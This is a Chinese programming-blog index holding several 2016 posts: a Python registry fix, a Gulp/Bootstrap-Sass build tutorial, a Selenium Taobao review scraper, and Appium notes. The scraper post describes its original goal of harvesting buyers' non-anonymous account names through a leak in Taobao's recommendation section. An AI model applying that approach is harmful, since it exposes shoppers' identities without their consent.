在这里有两个提示语，client_fail_alert 和 server_fail_alert ，分别是前端和后台（客户端和服务器）两边的提示语，可以通过设置 config/geetest.php 设置。

关于作者

静觅（崔庆才）个人主页：http://cuiqingcai.com

作者崔庆才发表于 2016-07-26 阅读次数：本文字数： 2.6k 阅读时长 ≈ 2 分钟

Python python version 2. required,which was not found in the registry 解决方案

不能在注册表中识别python2.7 新建一个register.py 文件

import sys
 
from _winreg import *
 
# tweak as necessary
version = sys.version[:3]
installpath = sys.prefix
 
regpath = "SOFTWARE\\Python\\Pythoncore\\%s\\" % (version)
installkey = "InstallPath"
pythonkey = "PythonPath"
pythonpath = "%s;%s\\Lib\\;%s\\DLLs\\" % (
    installpath, installpath, installpath
)
 
def RegisterPy():
    try:
        reg = OpenKey(HKEY_CURRENT_USER, regpath)
    except EnvironmentError as e:
        try:
            reg = CreateKey(HKEY_CURRENT_USER, regpath)
            SetValue(reg, installkey, REG_SZ, installpath)
            SetValue(reg, pythonkey, REG_SZ, pythonpath)
            CloseKey(reg)
        except:
            print "*** Unable to register!"
            return
        print "--- Python", version, "is now registered!"
        return
    if (QueryValue(reg, installkey) == installpath and
        QueryValue(reg, pythonkey) == pythonpath):
        CloseKey(reg)
        print "=== Python", version, "is already registered!"
        return
    CloseKey(reg)
    print "*** Unable to register!"
    print "*** You probably have another Python installation!"
 
if __name__ == "__main__":
    RegisterPy()

用Python 运行register.py后就能识别python2.7了代码来自：http://tech.valgog.com/2010/01/after-installing-64-bit-windows-7-at.html

作者 huxiao123 发表于 2016-07-20 阅读次数：本文字数： 1.1k 阅读时长 ≈ 1 分钟

JavaScript 基于ES6利用Gulp编译BootStrap-Sass源码

BootStrap

BootStrap 是一个前端CSS框架，它提供了一些便捷的组件方便我们快速构建前端页面，目前已经到了版本4，版本4是用 Sass 编写的，版本3是由 Less 编写的，后来增加了 Sass 版本。这说明了什么？BootStrap 已经向 Sass靠近了，个人感觉 Sass 比 Less 更为强大，具有更丰富的语法功能。所以，Sass 将会成为比 Less 更为主流的语言。目前常用的 BootStrap 版本是3，在官网也提供了相关 Sass 版本的下载。在此提供官网下载链接和 Sass 项目 GitHub 地址。 BootStrap BootStrap-Sass 在 BootStrap 的下载版本中，可以看到有三个。一个是编译好的 JS，CSS 文件，可以直接拿来用，方便快捷就可以下载这个来用。第二个是 Less 源码版本，你可以自己定义 Less 文件，在项目基础上继续用 Less 开发，编译成需要的 CSS 文件。第三个是后来新增的 Sass 版本，本节就以它为例来说明利用 Gulp 编译 BootStrap-Sass 的过程，目的一在于熟悉 Gulp 自动化编译 Sass 的流程，目的二在于了解前端自动化的工作原理。

Gulp

说完 BootStrap，我们再说下 Gulp，基于 Node.js。它干嘛的呢？就是一个前端自动化工具，什么用处？比如它可以编译 Less，Sass 生成到指定目录文件为 CSS，生成对应 map 文件，可以生成 JavaScript 的 map 文件，自动更新 html 中的 JS，CSS 引用路径，合并多个 JS，CSS 文件为统一整体，最小化压缩 JS，CSS 文件等等，最终目的呢？自动化替代重复劳动，提高效率。说到 Gulp，就不得不提到它的竞争对手 Grunt，它具有和 Gulp 几乎一样的功能，然而 Grunt 有几个缺点，比如插件职责不明确，产生大量临时文件，语法繁琐等等。相比之下，Gulp插件职责明确，基于流式，不会产生临时文件，语法简单。冲着这几点，果断选择 Gulp。利用 Gulp，我们就可以在项目中定义一个 gulpfile.babel.js 里面写入需要执行的任务，命令行执行 gulp 命令就可以完成自动化，一些重复的无聊的工作就不要你来做了。 Gulp中文网

ES6

说完 Gulp，然后就属 ES6 了，它是 ECMAScript 6 的简称，是 JavaScript 的一个新的版本类型，由于是 2015年发布的，所以也可以叫它 ES2015。我们之前编的 JavaScript 大多数是基于ES5或之前的版本，在 ES6 的基础上增加了许多新的语法特性，比如 Class，let，const 等等。在 ES5 中，Gulp 的执行文件叫做 gulpfile.js，到了 ES6中，它就叫做 gulpfile.babel.js 了，多了一个 badel，那 babel 又是什么？关于 ES6 的新特性预览可以看 ES6

Babel

Babel 其实是一个 JavaScript 编译器，支持 ES6，你可以用新型的 ES6 语法来编写你的 JavaScript，Babel 会为你生成对应的 ES5 的 JavaScript。乍看之下并没有什么关系，所以在这里你可以把 babel 看作 ES6 的代名词，在 Gulp 中，新型的 ES6 语法的 JavaScript 的 gulpfile 名字命名为 gulpfile.babel.js。 Babel

NPM

有一点 Node.js 基础的想必都知道这一个东西吧，Node Package Manager，Node.js 包管理器，利用它你可以安装 Node.js 的相关包，其中包括 Gulp。可以全局安装，加个 -g 参数，可以局部安装，需要路径下有个 package.json。 NPM怎样安装？安装了 Node.js 就好了。 Node.js 如果觉得速度慢，可以安装 CNPM，镜像源来源非国外，是淘宝的一个镜像源，速度快。 CMPM

Bower

在这里还需要用到一个工具 bower，类似 NPM，算是前端的一些组件管理工具，一些前端库比如 jquery，bootstrap 等等都可以用 bower 这个工具来下载，需要在根目录下建立一个 bower.json 和 .bowerrc 文件。利用 bower 我们就可以方便地管理前端的工具包了，不用我们去手动下载复制粘贴之类的。

WebStorm

在这再安利一个 IDE 吧，WebStorm，JetBrains公司出的一款强大又良心的编写前端的 IDE，支持各种插件，具有强大的语法提示，支持 JsHint 等代码检查，集成了终端，Git 等等强大的工具，Web 开发不二选择，推荐最新版本。 WebStorm

准备工作

扯完以上东西（其实还有好多没有扯完），让我们进入正题吧，正题是什么？哦没错，那就是

基于 ES6 语法使用 Gulp 编写 gulpfile.babel.js 来编译 BootStrap-Sass 源码。

下面是一些准备工作，没有做好的小伙伴请按照步骤一一完成。

安装 Node.js 和 NPM

从 Node 的官网下载 Node 并安装，安装流程不详细说明，安装完成之后 NPM 随之就会安装成功。命令行下输入 npm 检查一下是否可以正常运行。

安装 Gulp

1	npm install -g gulp

加入 -g 参数是全局安装，安装完成之后你可以在任意位置使用命令。

安装 Bower

1	npm install -g bower

依然是全局安装 bower。

下载 BootStrap-Sass

可直接进入 BootStrap 页面点击第三个下载 Sass 源码。也可以用 Git 将 BootStrap-Sass 的项目 clone 下来。

安装 WebStorm

推荐使用 WebStorm，可以开启 JsHint 等检测工具，具有强大的代码提示功能，不过不使用也没关系。在你的 IDE 打开下载的项目，

新建 gulpfile.babel.js

gulpfile.babel.js 是基于 ES6 的 Gulp 处理文件，新建它，稍后所有的工作都在这里完成。

新建 .babelrc

新建 .babelrc 文件，内容

{
  "presets": [
    "es2015"
  ]
}

这是指定 gulp 使用最新标准的 JavaScript 进行编译。

新建 .bowerrc

新建 .bowerrc 文件，这是 bower 的配置文件，可以指定路径等相关配置，内容为

1
2
3

{
  "directory": "bower_components"
}

这是指定 bower 工具下载前端组件时会默认下载到这个文件夹中。

修改 bower.json

可以精简 bower.json 文件，比如修改名称，删去 main，ignore 配置等。比如精简成

{
  "name": "bootstrap-sass-demo",
  "authors": [
    "Germey"
  ],
  "description": "bootstrap-sass is a Sass-powered version of Bootstrap, ready to drop right into your Sass powered applications.",
  "moduleType": "globals",
  "keywords": [
    "twbs",
    "bootstrap",
    "sass"
  ],
  "license": "MIT",
  "dependencies": {
    "jquery": ">= 1.9.0"
  }
}

修改 package.json 在进行 Gulp 配置文件编写之前，首先需要引入一些 Node.js 开发包，比如 babel，gulp，wiredep等等。修改 devDependencies 为

"devDependencies": {
    "babel-core": "^6.4.0",
    "babel-preset-es2015": "^6.3.13",
    "babel-register": "^6.9.0",
    "browser-sync": "^2.2.1",
    "del": "^1.1.1",
    "gulp": "^3.9.1",
    "gulp-autoprefixer": "^3.0.1",
    "gulp-babel": "^6.1.1",
    "gulp-cache": "^0.2.8",
    "gulp-cssnano": "^2.0.0",
    "gulp-eslint": "^0.13.2",
    "gulp-htmlmin": "^1.3.0",
    "gulp-if": "^1.2.5",
    "gulp-imagemin": "^2.2.1",
    "gulp-load-plugins": "^0.10.0",
    "gulp-plumber": "^1.0.1",
    "gulp-sass": "^2.0.0",
    "gulp-size": "^1.2.1",
    "gulp-sourcemaps": "^1.5.0",
    "gulp-uglify": "^1.1.0",
    "gulp-useref": "^3.0.0",
    "main-bower-files": "^2.5.0",
    "wiredep": "^2.2.2"
  }

执行

1	npm install

安装所需要的库。如此一来，所有的准备工作就差不多了。

实战

引入类库

首先引入一些必须的类库

import gulp from 'gulp';
import gulpLoadPlugins from 'gulp-load-plugins';
import browserSync from 'browser-sync'
import del from 'del';
import {stream as wiredep} from 'wiredep';

gulp 自不必多说，是 gulp 必须的核心类库。 gulp-load-plugins 是加载 gulp 插件的类库，我们知道 gulp 插件非常丰富，如果要一个个引入的话，需要写很多很多条 import 语句，引入了这个插件之后，调用时只需要加点(.) + 插件名称那就可以使用了。 browser-sync 是浏览器同步工具，如果有代码更新，浏览器会自动刷新更新资源。 del 是删除资源的工具包。 wiredep 是从 bower 同步到 html 中资源引用的插件，bower 中定义了依赖包，有了它，这些包的引用比如 js，css 就可以直接自动生成到 html 文件中。接着初始化一些变量。

1 2	const $ = gulpLoadPlugins(); const reload = browserSync.reload;

将加载插件的插件初始化为 $ 符号，然后初始化 reload 等变量。

Sass 编译

下载好 Sass 源码之后，打开 assets/stylesheets 目录，可以看到 BootStrap 的 Sass 源代码。不过发现文件名都是 _ 开头的，这种类型的文件是不能被编译生成的，所以新建一个 bootstrap.sass 文件，内容为

1	@import "_bootstrap";

最后生成的目录结构如下

|_____bootstrap-compass.scss
|_____bootstrap-mincer.scss
|_____bootstrap-sprockets.scss
|_____bootstrap.scss
|____bootstrap

接下来我们只需要编译 bootstrap.scss 即可。定义一个路径配置

const styles = {
    'in': 'assets/stylesheets/**/*.scss',
    'tmp': '.tmp/css',
};

包含 in 和 tmp 目录，in 代表 Sass 源文件地址，tmp 代表生成的编译后的 CSS 目录。接下来最重要的，指定一个 Gulp Task

gulp.task('styles', () => {
    return gulp.src(styles.in)
        .pipe($.plumber())
        .pipe($.sourcemaps.init())
        .pipe($.sass.sync({
            outputStyle: 'expanded',
            precision: 10,
            includePaths: ['.']
        }).on('error', $.sass.logError))
        .pipe($.autoprefixer({browsers: ['> 1%', 'last 2 versions', 'Firefox ESR']}))
        .pipe($.sourcemaps.write())
        .pipe(gulp.dest(styles.tmp))
        .pipe(reload({stream: true}));
});

task 是 gulp 的一个核心方法，定义了 styles 这个 task 之后，就可以执行

1	gulp styles

就可以完成以上定义的任务。首先利用 gulp.src 引入了需要编译的 Sass 文件，然后利用一系列 pipe 流式管道来指定一系列处理任务。 plumber 是一个错误处理插件，当出现错误时，不会立即卡主，而是进入 plumber，防止程序运行终止。 sourcemaps 是用来生成映射文件的一个插件，map 文件记录了从 Sass 编译成 CSS 的过程中，每一行的 Sass 代码对应哪一行的 CSS 代码。 sass 是核心的编译 Sass 的插件，指定了输出格式 expanded，precision 指定了当输出十进制数字时，使用多少位的精度，然后指定了路径和错误日志。 autoprefixer 是一个以友好方式处理浏览器前缀的插件，比如一些 CSS 的定义会出现 -webkit- 等等，此插件是用来处理浏览器前缀的。

Autoprefixer默认将支持主流浏览器最近2个版本，这点类似Google。不过你可以在自己的项目中通过名称或者模式进行选择：主流浏览器最近2个版本用“last 2 versions”；全球统计有超过1%的使用率使用“>1%”; 仅新版本用“ff>20”或”ff>=20”. 然后Autoprefixer计算哪些前缀是需要的，哪些是已经过期的。

dest 是输出编译后的文件，指定输出路径。 reload 是同步浏览器资源的方法。定义好如上内容之后，命令行输入

1	gulp styles

就会发现出现了 .tmp 目录，里面有 css/bootstrap.css

JavaScript 处理

同理，定义一个 task，用来处理 JavaScript

gulp.task('scripts', () => {
    return gulp.src(scripts.in)
        .pipe($.plumber())
        .pipe($.sourcemaps.init())
        .pipe($.babel())
        .pipe($.sourcemaps.write('.'))
        .pipe(gulp.dest(scripts.tmp))
        .pipe(reload({stream: true}));
});

相比之下，此处多了一个 babel 插件。 babel 是基于 ES6 标准的一个 JavaScript 插件，它可以对 ES6 版本的代码进行转换，转换成 ES5 标准，避免出现出现 ES6 不兼容问题。在此处还需要 scripts 的路径定义

const scripts = {
    'in': 'assets/javascripts/**/*.js',
    'tmp': '.tmp/js',
    'out': 'dist/js'
};

定义完成之后，执行

1	gulp scripts

就可以完成 JavaScript 的转换。另外还有一个专门负责代码风格转换的 task，使用了 eslint 这个插件

const lint = {
    'in': 'assets/javascripts/**/*.js'
};
gulp.task('lint', () => {
    return gulp.src(lint.in)
        .pipe(reload({stream: true, once: true}))
        .pipe($.eslint.format())
        .pipe($.if(!browserSync.active, $.eslint.failAfterError()));
});

执行

gulp lint

之后，就可以进行代码风格的标准化。

HTML处理

我们可以发现，在前面的输出路径都是 .tmp 临时目录，后面还会有一个目录是 dist 目录，试想一下，如果我们编译了 BootStrap 而在 HTML 中没有引用，那编译来还有必要吗？所以说，.tmp 作为临时目录，它可以存放被编译后的文件，但是不一定会被引用。被真正引用的文件才是真正有用的文件，我们将它放到 dist 目录。所以接下来的 HTML 处理就是检查一下有哪些 CSS 和 JS 被引用了，可以将它们合并，然后将新的文件放到 dist 并更新它的引用路径。

const html = {
    'in': 'assets/*.html',
    'out': 'dist'
};
gulp.task('html', ['styles', 'scripts'], () => {
    return gulp.src(html.in)
        .pipe($.useref({searchPath: ['.tmp', 'assets', '.']}))
        .pipe($.if('*.js', $.uglify()))
        .pipe($.if('*.css', $.cssnano()))
        .pipe($.if('*.html', $.htmlmin({collapseWhitespace: true})))
        .pipe(gulp.dest(html.out));
});

在这里定义了一个 task 叫做 html，第二个参数是 styles 和 scripts 组成的数组，意思是在执行这个 task 之前，首先要执行这两个任务。在处理时用到了 useref 这个插件，它可以检测 HTML 中引用的 CSS 和 JS，可以执行合并和压缩，然后更新新的路径。这个插件的作用如上所述。比如 HTML 当前内容是这样的

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Welcome</title>
    <!-- bower:css -->
    <!-- endbower -->
    <!-- build:css css/combined.css -->
    <link href="../.tmp/css/bootstrap.css" rel="stylesheet">
    <!-- endbuild -->
</head>
<body>
<h4>Hello This is a Gulp Sass Demo Configured by Germey.</h4>
</body>
    <!-- bower:js -->
    <!-- endbower -->
    <!-- build:js js/combined.js -->
    <script src="javascripts/bootstrap.js"></script>
    <script src="javascripts/bootstrap-sprockets.js"></script>
    <!-- endbuild -->
</html>

可以看到

1
2
3

<!-- build:css css/combined.css -->
    <link href="../.tmp/css/bootstrap.css" rel="stylesheet">
<!-- endbuild -->

这里引用了 .tmp 目录下的 bootstrap.css，然后在外面用注释的形式定义了构建的路径和文件名。那么执行这个任务之后，它便会将当前引用的 .tmp 目录下的 bootstrap.css 处理并输出为 combined.css，然后新生成的 HTML 文件的引用路径也相应改为 combined.css JS 也是同理

<!-- build:js js/combined.js -->
    <script src="javascripts/bootstrap.js"></script>
    <script src="javascripts/bootstrap-sprockets.js"></script>
<!-- endbuild -->

在此处是将两个文件处理合并为 combined.js 执行

gulp html

后，会新生成一个 HTML 文件到 dist 目录，内容为

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Welcome</title><!-- bower:css --><!-- endbower -->
    <link rel="stylesheet" href="css/combined.css">
</head>
<body><h4>Hello This is a Gulp Sass Demo Configured by Germey.</h4></body><!-- bower:js --><!-- endbower -->
<script src="js/combined.js"></script>
</html>

dist 的目录结构为

|____css
| |____combined.css
|____index.html
|____js
| |____combined.js

以上为利用 useref 插件进行 HTML 处理的过程。

图片压缩处理

接下来是对图片字体及其他格式文件的处理。图片的主要处理是进行压缩

const images = {
    'in': 'assets/images/**/*',
    'out': 'dist/images'
};
gulp.task('images', () => {
    return gulp.src(images.in)
        .pipe($.imagemin({
            progressive: true,
            interlaced: true,
            svgoPlugins: [{cleanupIDs: false}]
        }))
        .pipe(gulp.dest(images.out));
});

定义好了 images 的输入和输出路径之后，定义 images 这个 task，在这里使用了 imagemin 这个插件 imagemin 插件是用来压缩图片的插件，处理后图片的占用空间会变小。执行

1	gulp images

即可完成对图片的压缩

字体处理

字体的处理，筛选出某些特定格式的字体，输出到指定目录

const fonts = {
    'in': ['assets/fonts/bootstrap/*'],
    'tmp': '.tmp/fonts',
    'out': 'dist/fonts'
};
gulp.task('fonts', () => {
    return gulp.src(require('main-bower-files')('**/*.{eot,svg,ttf,woff,woff2}', function(err) {
    })
        .concat(fonts.in))
        .pipe(gulp.dest(fonts.tmp))
        .pipe(gulp.dest(fonts.out));
});

执行

1	gulp fonts

即可完成字体的处理

额外文件处理

在项目中还存在非 HTML 的文件，比如视频，音频，PHP等。这些做一下统一判断然后归档即可。

const extras = {
    'in': [
        'assets/*.*',
        '!assets/*.html'
    ],
    'out': 'dist'
};
gulp.task('extras', () => {
    return gulp.src(extras.in, {
        dot: true
    }).pipe(gulp.dest(extras.out));
});

其中 in 指定了在 asset 目录中除 html 后缀的文件，此处进行读入筛选，然后输出到指定路径即可。执行

1	gulp extras

即可完成额外文件的处理

文件依赖处理

设想一个情景，一个项目需要很多很多依赖库，我们在 bower.json 中定义好了所有的依赖，使用 bower 将他们下载了下来，如果我们需要在 HTML 中引用他们，如果我们还是手动地添加一个个引用那是不是太麻烦了？没错，这个操作同样可以自动化操作，借助 wiredep 插件即可。

const wire = {
    'in': 'assets/*.html',
    'out': 'dist'
};
gulp.task('wiredep', () => {
    gulp.src(wire.in)
        .pipe(wiredep({
            ignorePath: /^(\.\.\/)*\.\./
        }))
        .pipe($.useref({searchPath: ['.tmp', 'assets', '.']}))
        .pipe($.if('*.js', $.uglify()))
        .pipe($.if('*.css', $.cssnano()))
        .pipe(gulp.dest(wire.out));
});

在这里使用了 wiredep 插件。在 HTML中定义如下内容

1 2	<!-- bower:js --> <!-- endbower -->

执行

1	gulp wiredep

之后，便会自动更新 bower.json 中所有依赖库的引用，在这里以 JS 为例子。当前在 bower.json 中定义了

1
2
3

"dependencies": {
    "jquery": ">= 1.9.0"
  }

执行完毕之后，HTML中便有了

1
2
3

<!-- bower:js -->
<script src="/bower_components/jquery/dist/jquery.js"></script>
<!-- endbower -->

路径会随之更新。

服务器

最后是一个 serve 的 task 在本地搭建一个服务器来测试，同时监听文件的变动随时更新资源文件。

const serve = {
    'baseDir': ['.tmp', 'assets'],
    'baseDirDist': ['dist'],
    'routes': {
        '/bower_components': 'bower_components'
    },
    'port': 9000
};
gulp.task('serve', ['styles', 'scripts', 'fonts', 'wiredep'], () => {
    browserSync({
        notify: false,
        port: serve.port,
        server: {
            baseDir: serve.baseDir,
            routes: serve.routes
        }
    });
    gulp.watch([
        html.out, scripts.tmp, scripts.out, images.out, fonts.tmp, fonts.out
    ]).on('change', reload);
    gulp.watch(styles.in, ['styles']);
    gulp.watch(scripts.in, ['scripts']);
    gulp.watch(fonts.in, ['fonts']);
    gulp.watch('bower.json', ['wiredep', 'fonts']);
});
gulp.task('serve:dist', () => {
    browserSync({
        notify: false,
        port: serve.port,
        server: {
            baseDir: serve.baseDirDist
        }
    });
});

上述 serve 首先要执行 styles, scripts, fonts, wiredep 的操作，然后在 9000 端口上运行。同时利用 watch 方法监听文件的变动，随时更新。

删除和一键构建

最后还有清理构建文件和一键构建的功能。清理 task 叫做 clean。

1	gulp.task('clean', del.bind(null, ['.tmp', 'dist']));

即将 .tmp 和 dist 目录进行清理。一键构建就是执行其他所有操作，将所有操作汇总。

const build = {
    'in': 'dist/**/*'
};
gulp.task('build', ['lint', 'html', 'images', 'fonts', 'extras'], () => {
    return gulp.src(build.in).pipe($.size({title: 'build', gzip: true}));
});
gulp.task('default', ['clean'], () => {
    gulp.start('build');
});

最后执行了一个总的压缩汇总，

代码

以上便是利用 Gulp 编译 Bootstrap-Sass 的全部过程。整个项目的代码如下 GulpBootstrapSass 如果有问题，欢迎留言交流，希望对大家有帮助！

作者崔庆才发表于 2016-07-04 阅读次数：本文字数： 12k 阅读时长 ≈ 11 分钟

Python Python爬虫实战八之利用Selenium抓取淘宝匿名旺旺

2022 年最新 Python3 网络爬虫教程

大家好，我是崔庆才，由于爬虫技术不断迭代升级，一些旧的教程已经过时、案例已经过期，最前沿的爬虫技术比如异步、JavaScript 逆向、安卓逆向、智能解析、WebAssembly、大规模分布式、Kubernetes 等技术层出不穷，我最近新出了一套最新最全面的 Python3 网络爬虫系列教程。

博主自荐：截止 2022 年，可以将最前沿最全面的爬虫技术都涵盖的教程，如异步、JavaScript 逆向、安卓逆向、智能解析、WebAssembly、大规模分布式、Kubernetes 等，市面上目前就这一套了。

最新教程对旧的爬虫技术内容进行了全面更新，搭建了全新的案例平台进行全面讲解，保证案例稳定有效不过期。

教程请移步：

【2022 版】Python3 网络爬虫学习教程

如下为原文。

更新

其实本文的初衷是为了获取淘宝的非匿名旺旺，在淘宝详情页的最下方有相关评论，含有非匿名旺旺号，快一年了淘宝都没有修复这个。可就在今天，淘宝把所有的账号设置成了匿名显示，SO，获取非匿名旺旺号已经不可能了。那本节就带大家抓取匿名旺旺号熟悉一下 Selenium 吧。

2016/7/1

前言

嗯，淘宝，它一直是个难搞的家伙。而且买家在买宝贝的时候大多数都是匿名评论的，大家都知道非匿名评论是非常有用的，比如对于大数据分析，分析某个宝贝的购买用户星级状况等等。现在已经不能获取非匿名了，此句已没有意义了。对于抓淘宝，相信尝试过的童鞋都能体会到抓取它到艰辛，最简单的方法莫过于模拟浏览器了，本节我们就讲解一下利用 Selenium 抓取淘宝评论的方法。项目提供了如下功能：

输入淘宝关键字采集淘宝链接并写入到文件
从文件读取链接，执行评论采集
将评论和旺旺号保存到 Excel 中
记录当前采集链接索引，保存进度

准备工作

在开始本节之前你需要了解一些基础知识，我们需要用到 Selenium 这个东西，详情请看 Selenium 用法我们首先讲解一下你需要做怎样的配置。首先你需要安装 Python，版本是 2.7 然后需要安装的 Python 类库。

1	pip install pyquery selenium twisted requests xlrd xlwt xlutils

安装浏览器 Chrome，安装浏览器 Chrome，安装浏览器 Chrome。然后下载 ChromeDriver，ChromeDriver 是驱动浏览器的工具，需要把它配置到环境变量里。有的童鞋说，为什么不用 PhantomJS，因为为了防止淘宝禁掉我们，需要登录淘宝账号，登录过程可能会出现奇奇怪怪得验证码，滚动条，手机验证，如果用 PhantomJS 的话不方便操作，所以在这里我们就使用 Chrome 了。 ChromeDriver 上面是 ChromeDriver 的下载地址，谷歌都上得了，这个不在话下吧，这是最官方的版本，其他链接请自行搜索。找到对应平台的 ChromeDriver，解压后将可执行文件配置到环境变量里，配置到环境变量里，配置到环境变量里！重要的话说三遍。

流程简述

首先我们拿一个例子来演示一下全过程。随意打开天猫一个链接示例链接我们首先观察一下评论，可以发现所有的评论都是匿名的。即使这个用户不是匿名评论的，那也会显示匿名，淘宝这保密做的挺好。心机的淘宝啊，那我们如果想获取一些旺旺号该咋办？接下来我们返回宝贝详情页面，然后一直下拉下拉，拉到最最后，可以看到有个“看了又看”板块。有没有！！发现了新大陆，这是什么？这是此宝贝相关宝贝以及它的一些评论。看到了有非匿名用户了，哈哈哈，淘宝加密了评论，推荐部分却没有加密。嗯，就从这里，我们把它们的旺旺号都抓下来，顺便把评论和购买的宝贝抓下来。现在已经全部改成了匿名，上述话已经无意义了。那么抓取完之后，保存到哪里呢？为了便于管理和统计，在这里保存到 Excel 中，那么就需要用到 xlrd, xlwt, xlutils 等库。嗯，动机就是这样。

实战爬取

抓取过程

首先我们观察这个链接，在最初的时候，其实网页并没有加载最下方的“看了又看”内容的，慢慢往下滑动网页，滑到最下方之后，才发现看了又看页面才慢慢加载出来。很明显，这个地方使用了 Ajax，由于我们用的是 Selenium，所以这里我们不能直接来模拟 Ajax 的 Request，需要我们来模拟真实的用户操作。所以我们要模拟的就是，在网页部分加载出来之后，模拟浏览器滑动到下方，使“看了又看”内容显示出来，然后获取网页源代码，解析之即可。那么在这里就出现了两个至关重要的点，一个是判断网页框架大体加载出来，另一个是模拟滑动直到最下方的内容加载出来。首先，我们解决第一个问题，怎样判断网页框架大体加载出来。我们可以用网页中的某个元素的出现与否来判断。比如这一部分是否加载出来。审查一下代码，ID 叫做 J_TabBarBox，好，那就用它来作为网页初步加载成功的标志。在 Selenium 中，我们用显式等待的方法来判断该元素是否已经加载成功。

try:
    driver.get(url)
    WebDriverWait(driver, timeout).until(
        EC.presence_of_element_located((By.ID, "J_TabBarBox"))
    )
except TimeoutException:
    return False
if is_recommends_appear(driver, max_scroll_time):
    print u'已经成功加载出下方橱窗推荐宝贝信息'
    return driver.page_source

接下来我们需要模拟下拉浏览器，不妨直接下拉到底部，再从底部向上拉，可能需要下拉多次，所以在这里定义了一个下拉次数，那么判断“看了又看”正文内容是否出现依然可以用显式等待的方法。浏览器审查元素发现它的选择器是 #J_TjWaterfall li 那么可以用如下方法来判断是否加载成功

try:
    driver.find_element_by_css_selector('#J_TjWaterfall li')
except NoSuchElementException:
    return False
return True

下拉过程可以用执行 JavaScript 的方法实现。

1 2	js = "window.scrollTo(0,document.body.scrollHeight-" + str(count * count* 200) + ")" driver.execute_script(js)

其中 count 是下拉的次数，经过测试之后，每次拉动距离和 count 是平方关系比较科学，具体不再描述，当然你可以改成自己想要的数值。嗯，加载出来之后，就可以用

1	driver.page_source

来获取网页源代码了用 pyquery 解析即可。

doc = pq(html)
items = doc('#J_TjWaterfall > li')
print u'分析得到下方宝贝中的用户评论:'
for item in items.items():
    url = item.find('a').attr('href')
    if not url.startswith('http'):
        url = 'https:' + url
    comments_info = []
    comments = item.find('p').items()
    for comment in comments:
        comment_user = comment.find('b').remove().text()
        comment_content = comment.text()
        anonymous_str = config.ANONYMOUS_STR
        if not anonymous_str in comment_user:   ＃此句本来用来判断是否匿名，现淘宝已修复该漏洞，只能抓取全部匿名的了
            comments_info.append((comment_content, comment_user))
    info.append({'url': url, 'comments_info': comments_info})
return info

然后保存到 Excel 中。运行结果截图可以发现，另外提供了先登陆后爬取的功能，然后保存了爬取进度。

采集链接

刚才我们测试的链接是哪里来的？我们不能一个个去找吧？所以，在这里又提供了一个采集链接的过程，将采集的链接保存到文本，然后抓取的时候从文本读取一个个链接即可。所以在这里我们模拟搜索的过程，关键字让用户输入，将搜索的链接采集下来。在此 Selenium 模拟了输入文字，点击按钮和翻页的功能。核心代码如下下面的方法模拟了加载出搜索框之后输入文字点击回车的过程，将网页的结果返回。

def get_results(keyword):
    driver = config.DRIVER
    link = config.SEARCH_LINK
    driver.get(link)
    try:
        WebDriverWait(driver, config.TIMEOUT).until(
            EC.presence_of_element_located((By.ID, "mq"))
        )
    except TimeoutException:
        print u'加载页面失败'
    try:
        element = driver.find_element_by_css_selector('#mq')
        print u'成功找到了搜索框'
        keyword = keyword.decode('utf-8', 'ignore')
        print keyword
        print u'输入关键字', keyword
        for word in keyword:
            print word
            element.send_keys(word)
        element.send_keys(Keys.ENTER)
    except NoSuchElementException:
        print u'没有找到搜索框'
    print u'正在查询该关键字'
    try:
        WebDriverWait(driver, config.TIMEOUT).until(
            EC.presence_of_element_located((By.CSS_SELECTOR, "#J_ItemList div.productImg-wrap"))
        )
    except TimeoutException:
        print u'查询失败'
    html = driver.page_source
    return html

下面的方法模拟了翻页的过程，到指定的翻页数目为止

def get_more_link():
    print u'正在采集下一页的宝贝链接'
    driver = config.DRIVER
    try:
        js = "window.scrollTo(0,document.body.scrollHeight)"
        driver.execute_script(js)
    except WebDriverException:
        print u'页面下拉失败'
    try:
        next = driver.find_element_by_css_selector('#content b.ui-page-num > a.ui-page-next')
        next.click()
    except NoSuchElementException:
        print u'找到了翻页按钮'
    driver.implicitly_wait(5)
    try:
        WebDriverWait(driver, config.TIMEOUT).until(
            EC.presence_of_element_located((By.CSS_SELECTOR, "#J_ItemList div.productImg-wrap"))
        )
    except TimeoutException:
        print u'查询失败'
    html = driver.page_source
    parse_html(html)

运行结果截图采集到到内容保存到 urls.txt 中嗯，这下采集链接和爬取链接都有了。

代码放送

扯了这么多，许多童鞋已经蠢蠢欲动了，大声告诉我你们想要的是什么？哦没错！代码！嗯在这呢！代码

附加扯淡

嗯想说一句，在这里还提供了一些可配置项，比如翻页最大次数，超时时间，下拉次数，登录链接等等。都可以在 config.py 中配置。

URLS_FILE

保存链接单的文件

OUT_FILE

输出文本 EXCEL 路径

COUNT_TXT

计数文件

DRIVER

浏览器驱动

TIMEOUT

采集超时时间

MAX_SCROLL_TIME

下拉滚动条最大次数

NOW_URL_COUNT

当前采集到第几个链接

LOGIN_URL

登录淘宝的链接

SEARCH_LINK

采集淘宝链接搜索页面

CONTENT

采集链接临时变量

PAGE

采集淘宝链接翻页数目

FILTER_SHOP

是否过滤相同店铺

ANONYMOUS_STR

匿名用户标志，已失效

哦，对了，程序怎么用啊？看 README！

作者崔庆才发表于 2016-06-30 阅读次数：本文字数： 5.3k 阅读时长 ≈ 5 分钟

Other Appium学习笔记

在网上搜了很多关于Appium的教程，但没有系统完整的教程，在网上找了本关于appium的英文书籍，边学边翻译，同时记录学习心得，与志同道合的人一起交流探讨！去除很多繁琐的东西，添加自己实践的东西，一起交流，有写错的或者翻译不对的地方，请各位大神指出来，一起交流进步第一章 Appium的工作原理 1.iOS端执行测试脚本，发送HTTP请求给Appium Server , Appium Server发送命令给Apple Instruments, Apple Instruments寻找设备，开始执行脚本；每执行一条语句都会原路返回（执行的结果也就是我们常说的log） 2.Android端首先Appium仅支持安卓版本17或以上版本!如果需要测试17以前版本，需要使用Selendroid.它的工作原理其实与iOS工作原理一样：执行测试脚本，发送HTTP请求给Appium Server , Appium Server发送命令给UIAutomator(>=17时){Selendroid（<=17）} ，UIAutomator(>=17时){Selendroid（<=17）} 寻找设备，开始执行脚本；每执行一条语句都会原路返回（执行的结果也就是我们常说的log）备注：执行脚本想要给Appium发送命令，其中必须有一个翻译器，翻译成Appium能识别的命令（Selenium JSON）,这个工具简单理解就是把咱们写的脚本给转换成appium可以识别的命令。

作者路由新定发表于 2016-06-30 阅读次数：本文字数： 626 阅读时长 ≈ 1 分钟

Python Python爬虫进阶四之PySpider的用法

